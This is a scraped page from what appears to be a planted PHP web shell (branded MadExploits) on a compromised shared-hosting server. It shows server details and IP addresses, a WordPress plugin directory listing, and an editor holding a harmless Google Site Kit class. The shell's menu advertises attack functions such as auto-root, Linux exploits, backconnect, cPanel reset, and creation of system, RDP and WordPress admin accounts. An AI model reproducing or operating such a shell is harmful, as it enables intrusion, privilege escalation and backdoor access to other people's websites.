Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.117.254.221
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
anonmags.com /
wp-content /
plugins /
google-site-kit /
includes /
Core /
Key_Metrics /
[ HOME SHELL ]
Name
Size
Permission
Action
Key_Metrics.php
2.9
KB
-rw-r--r--
Key_Metrics_Settings.php
2.6
KB
-rw-r--r--
Key_Metrics_Setup_Completed_By...
834
B
-rw-r--r--
Key_Metrics_Setup_New.php
1.94
KB
-rw-r--r--
REST_Key_Metrics_Controller.ph...
5.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Key_Metrics_Setup_Completed_By.php
<?php /** * Class Google\Site_Kit\Core\Key_Metrics\Key_Metrics_Setup_Completed_By * * @package Google\Site_Kit\Core\Key_Metrics * @copyright 2023 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Key_Metrics; use Google\Site_Kit\Core\Storage\Setting; /** * Class for handling the setup completion state of Key Metrics. * * @since 1.113.0 * @access private * @ignore */ class Key_Metrics_Setup_Completed_By extends Setting { /** * The option_name for this setting. */ const OPTION = 'googlesitekit_key_metrics_setup_completed_by'; /** * Gets the expected value type. * * @since 1.113.0 * * @return string The type name. */ protected function get_type() { return 'integer'; } }
Close